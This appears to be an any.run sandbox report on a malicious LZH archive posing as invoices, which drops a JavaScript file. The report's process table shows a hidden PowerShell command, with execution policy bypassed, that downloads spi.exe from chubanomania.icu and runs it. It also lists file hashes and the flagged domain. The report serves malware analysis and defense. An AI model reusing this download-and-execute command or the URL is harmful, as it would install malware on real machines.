File name: | рахунки (2).lzh |
Full analysis: | https://app.any.run/tasks/cf162884-4a73-4145-aae1-fab4ff63feb9 |
Verdict: | Malicious activity |
Analysis date: | December 14, 2018, 10:13:03 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/x-lzh-compressed |
File info: | LHarc 1.x/ARX archive data [lh0], with "\340\245\245\341\342\340 (2).xls" |
MD5: | CA69F484DE5EC9865E9177BAC358F4DF |
SHA1: | A226D3B2CF8147234B078E289455E7691D264BEA |
SHA256: | BDAFD99346C648F34F0CFFD632D2C0F07292CE91191769112AA4C253D4615221 |
SSDEEP: | 1536:E5ezOgigm/9DPlvtJDpnRb2g+EeYIfVTB38TehYTdeHVhjqabWHLtyeGxmlrdgo4:E5ezOgigm/9rlvtJDpnRb2g+EeYIfVT7 |
.lzh/lha | | | LHARC/LZARK compressed archive (generic) (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2808 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\рахунки (2).lzh" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
2748 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\a.Sá¬Gpaá n 7162 ìáGá½_n.js" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2292 | "C:\Windows\System32\cmd.exe" /c powershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://chubanomania.icu/prima/spi.exe?ajEKAGb','%temp%jJx13.exE'); & StArt %TemP%jJx13.ExE | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3040 | powershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://chubanomania.icu/prima/spi.exe?ajEKAGb','C:\Users\admin\AppData\Local\TempjJx13.exE'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4088 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2228 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\a.Sá¬Gpaá n 7162 ìáGá½_n.js" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3380 | "C:\Windows\System32\cmd.exe" /c powershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://chubanomania.icu/prima/spi.exe?ajEKAGb','%temp%jJx13.exE'); & StArt %TemP%jJx13.ExE | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1456 | powershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://chubanomania.icu/prima/spi.exe?ajEKAGb','C:\Users\admin\AppData\Local\TempjJx13.exE'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3040 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2NR97PDHXQ694EYRRTYA.temp | — | |
MD5:— | SHA256:— | |||
4088 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4088 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF2B0ABF20F934F9A1.TMP | — | |
MD5:— | SHA256:— | |||
1456 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PPF1B0JDLQSA5904K1XG.temp | — | |
MD5:— | SHA256:— | |||
4088 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\aÑÑßGa (2).xls.LNK | lnk | |
MD5:BDE5D2DBF7D752DB9C400F3286F59293 | SHA256:234336F66B7F724FCEECBBD22818F6627257245D2B15E3773E66E5432AC16E56 | |||
2808 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\рахунки (2)\aÑÑßGa (2).xls | document | |
MD5:660EE6AF58AB56B9CDD1574120F88CDF | SHA256:3579B8CCB480F25F606F44532A7664703BD8DA720528216A9F4D27355B4C6804 | |||
3040 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19eaf2.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2808 | WinRAR.exe | C:\Users\admin\Desktop\aÑÑßGa (2).xls | document | |
MD5:660EE6AF58AB56B9CDD1574120F88CDF | SHA256:3579B8CCB480F25F606F44532A7664703BD8DA720528216A9F4D27355B4C6804 | |||
1456 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2808 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\рахунки (2)\a.Sá¬Gpaá n 7162 ìáGá½_n.js | text | |
MD5:F75113A4768FC0943AF2B393F3F806BA | SHA256:F50453A563D136E1EC50651C3E4F1B9682865E5085B4D3023761B3C8754584A5 |
Domain | IP | Reputation |
---|---|---|
chubanomania.icu |
| malicious |